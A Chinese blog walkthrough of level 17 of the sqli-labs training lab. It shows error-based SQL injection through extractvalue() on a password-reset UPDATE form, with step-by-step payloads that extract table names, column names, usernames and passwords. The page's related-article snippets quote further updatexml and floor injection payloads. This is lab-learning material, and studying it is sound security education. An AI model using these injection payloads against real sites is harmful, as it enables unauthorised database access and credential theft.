sqli-labs通关(十七)

最新推荐文章于 2024-05-22 22:54:45 发布
最新推荐文章于 2024-05-22 22:54:45 发布
阅读量588 收藏 2
点赞数 1
分类专栏: sqli-labs通关 文章标签: sql 数据库 web安全 mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65950075/article/details/130495538
版权

第十七关

这一关跟前面的关卡都不一样,是全新的关卡,页面是一个密码重置页面,需要输入用户名,然后输入新的密码,就会把我们的旧密码替换掉。所以就会用到数据库的update更新数据,不再是前面的查询数据,所以之前的联合注入和布尔盲注以及时间盲注都不能用了。这里我们要用到之前使用过的报错注入

 这里要先输入正确的用户名,验证成功后才会把新密码替换,所以我们输入

 admin

1' and extractvalue(1,concat(0x7e,(select database())))#

 爆表名

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))#

 爆列名

1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))#

 爆内容

1' and extractvalue(1,concat(0x7e,(select group_concat(username) from users)))#

 发现报错了

那是因为在mysql中一个语句中不能先select表中的某些值,再update这个表。

 但是我们可以用(select username from users)a替换users来进行绕过

1' and extractvalue(1,concat(0x7e,(select group_concat(username) from (select username from users)a)))#

 但是回显并没有完全,因为报错回显只能回显32位

 所以我们使用mid()函数来截取,因为是从32位开始不能看到,所以我们从第32位开始截取,截取后32位

1' and extractvalue(1,concat(0x7e,mid((select group_concat(username) from (select username from users)a),32,32)))#

1' and extractvalue(1,concat(0x7e,(select group_concat(password) from (select password from users)a)))#

然后是后面32位 

1' and extractvalue(1,concat(0x7e,mid((select group_concat(password) from (select password from users)a),32,32)))#

 

 

 

幕溪WM
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
sqli-labs靶场17(基于post的更新查询报错注入)
qq_46527080的博客
12-18 712
知识点 updatexml()函数 updatexml()函数与extractvalue()类似,是更新xml文档的函数。 语法updatexml(目标xml文档,xml路径,更新的内容) updatexml(XML_document,XPath_string,new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:Xpath_String(Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条
sqli-labs-----第17
wyzhxhn的博客
11-10 790
基于报错的更新查新。
SQLI-labs-第十七
weixin_54055099的博客
05-16 879
Sqli-labs第十七,二次注入、报错注入
sqli-labs第十七
yuqnqi的博客
05-09 279
查看源码,发现uname被检查了,passwd没有被检查 ,所以尝试使用通过passwd参数进行注入测试。
Sqli-lab教程-史上最全详解(1-22通关
qq_52364123的博客
04-10 8700
sql注入集合
sqli-labs(17)
最新发布
2302_78903258的博客
05-22 431
进入第十七,我们发现页面又进行了变化,显示的是密码重置,又根据题目提示为update,指的是源代码用update的方式进行密码的更新。这里我们用到的是基于update的报错注入。还有,uname的值我们要用它提供的,因为我们用到正确的用户名才能进行密码修改,从而进行注入。这里我们进行注入的参数变成了passwd,原因是passwd这里有注入点,进行了更新语句。这里我只放出了获取emails表下的数据,其他的数据根据你所需要的表再获取。这里我就不介绍他们的用法啦,大家可以看看其他的博主。
详细sqli-labs(1-20)通关讲解
05-18
详细sqli-labs(1-20)通关讲解
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
2020-10-23-sqli-labs.md
01-24
sqli-labs靶场通关教程
sqli-labs 靶场通关(11-22)
知世郎
10-16 232
前十使用的是get请求,参数都体现在url上面,而从十一开始是post请求,参数是在表单里面。1' ,2, (extractvalue(1,concat(0x5c,(select group_concat(password,username) from users),0x5c)))# 爆账户密码。1',2,updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))# 爆账户密码。
Sqlilabs-17
KAKA的博客
07-07 849
来到了 17 ,从这开始刚学习需要借助源码来配合学习,本学习内容是 update 内容 从源码中可以看到,开发者的意图流程是: 首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的… 继续往下看源码,你会发现 username 身上加了个check_input,转到
floor报错注入的两种格式
aitong的博客
01-31 454
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
sqli-labs(less-17)
筱阳的博客
06-09 3853
首先要介绍UpdateXML('xml_target','xpath_expr','new_xml')举个例子就知道了可以看到,uname用check_input()函数进行了处理看看是如何处理的只截取15个字符get_magic_quotes_gpc()当magic_quotes_gpc=On的时候,函数get_magic_quotes_gpc()就会返回1当magic_quotes_gpc=O...
sqli-labs-Less-17
giun的博客
02-13 496
这一与密码有,我们尝试下报错 输入username:admin password=1' 故对密码处理时应该使用“ 报错注入 username:admin password:1'and extractvalue(1,concat(0x7e,(select version()),0x7e))# version()可以换成其他语句进行注入 延时注入 username:admin pass...
sqli-labs (less 17)
Xi4or0uji
08-01 474
less 17 报错函数注入 在开始放出payload之前,可能要先稍微提一下 从后台源码可以看出,uname有个check_input函数过滤,但是passwd没有,所以注入点是在passwd上面 接下来还要看下extractvalue这个报错函数 这里推荐一下官方的解释和一篇讲得简单点的博客 https://dev.mysql.com/doc/refman/5.7/en/xml-f...
sqli-labs】闯记录17~20
qq_43665434的博客
03-10 178
sqli-labs】闯记录17~20 【less-17】基于密码的报错注入 1、源码分析 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); function check_input($value) { if(!empty($value)) { // truncation (see comments)
sqli-labs通关28
03-05
通关28其中的一个卡,下面是sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值